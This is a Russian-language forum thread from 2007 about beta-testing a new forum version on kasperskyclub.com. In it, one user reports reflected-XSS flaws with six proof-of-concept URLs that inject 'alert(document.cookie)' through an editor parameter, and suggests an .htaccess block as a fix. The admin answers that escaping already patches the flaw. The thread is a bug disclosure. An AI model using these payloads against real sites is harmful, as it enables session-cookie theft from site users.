Ig0r Опубликовано 27 июня, 2007 Опубликовано 27 июня, 2007 Друзья, предлагаем принять участие в бета-тестировании новой версии форума – 2.3.1. Адрес форума - http://www.kasperskyclub.com/forums/ Зайти могут все, кроме обычных пользователей. Им для участия надо подать заявку. Известные ошибки: Нет репутации. Тестирование завершено.
CbIP Опубликовано 28 июня, 2007 Опубликовано 28 июня, 2007 Опа! Только что чат после каждого сообщения выдавал неизвестную ошибку и не отсылал собщения! А потом - посмотрите, где индикатор обновления (gif-ка) крутится!
Ig0r Опубликовано 28 июня, 2007 Автор Опубликовано 28 июня, 2007 Подаю заявку Доступ итак открыт. Я тоже подаю заявку! Подаю заяву Доступ разрешен. Опа! Только что чат после каждого сообщения выдавал неизвестную ошибку и не отсылал собщения!А потом - посмотрите, где индикатор обновления (gif-ка) крутится! Какие сообщения отправлялись? У меня крутилка в MF вертится на месте. На основном форуме в правильном месте?
CbIP Опубликовано 28 июня, 2007 Опубликовано 28 июня, 2007 Сообщения? Обычные Вобще без намёков на искажённый язык. Потом само-собой перестало. Крутилка отображается нормально на 2.2.2 На 2.3.1 тоже глюк исчез. Не знаю, почему
radioelectron Опубликовано 28 июня, 2007 Опубликовано 28 июня, 2007 (изменено) Да он кишит уязвимостями! Прошелся две минуты по сайтам специализированным http://www.kasperskyclub.com/forums/jscripts/folder_rte_files/module_email.php?editorid=";alert(document.cookie);var i=" http://www.kasperskyclub.com/forums/jscripts/folder_rte_files/module_table.php?editorid=%22;alert(document.cookie);var%20i=%22 http://www.kasperskyclub.com/forums/jscripts/folder_rte_files/module_bbcodeloader.php?editorid=alert(document.co%20%20okie);/*&id=*/var%20i=%22 http://www.kasperskyclub.com/forums/jscripts/folder_rte_files/module_div.php?editorid=%22;alert(document.cookie);var%20i=%22 http://www.kasperskyclub.com/forums/jscripts/folder_rte_files/module_link.php?editorid=%22;alert(document.cookie);var%20i=%22 http://www.kasperskyclub.com/forums/jscripts/folder_rte_files/module_email.php?editorid=%22;alert(document.cookie);var%20i=%22 Заплатка: Надо кинуть файл .htaccess в папку /jscripts/folder_rte_files/ с содержанием: Order Deny,Allow Deny from all Изменено 28 июня, 2007 пользователем radioelectron
JIABP Опубликовано 28 июня, 2007 Опубликовано 28 июня, 2007 Т.к тут закрытый (почти закрытый форум) то даже цензурить не буду. Смотриет что с нами можно сделать
radioelectron Опубликовано 29 июня, 2007 Опубликовано 29 июня, 2007 Чет руты молчат. Исправили бы уж давно. XSS-атаку эту можно не только с бета-форумом провести, но и с этим.
Ig0r Опубликовано 30 июня, 2007 Автор Опубликовано 30 июня, 2007 Да он кишит уязвимостями! Прошелся две минуты по сайтам специализированным Спасибо. Но Вы проверяли? Заветная строчка выглядит по-другому: <?php print '"'.trim( htmlspecialchars( substr( $_REQUEST['editorid'], 0, 30 ) ) ).'";'; ?> В конце мая вышло исправление... Кстати, куки своровать можно, но есть дополнительная защита. Кстати 2, особенно интересует слетает ли авторизация.
radioelectron Опубликовано 30 июня, 2007 Опубликовано 30 июня, 2007 Кстати 2, особенно интересует слетает ли авторизация. Неа В конце мая вышло исправление... Но все-таки, файлик хтаксесс не мешало бы воткнуть в ту папку. Так, на всякий случай
Ig0r Опубликовано 30 июня, 2007 Автор Опубликовано 30 июня, 2007 Но тогда какая-то сомнительная функция добавления редактора не будет работать.
Ig0r Опубликовано 9 июля, 2007 Автор Опубликовано 9 июля, 2007 Если все в порядке, скоро будем обновляться до 2.3.2
JIABP Опубликовано 10 июля, 2007 Опубликовано 10 июля, 2007 Если все в порядке, скоро будем обновляться до 2.3.2 Бэкап незабудь сделать
Рекомендуемые сообщения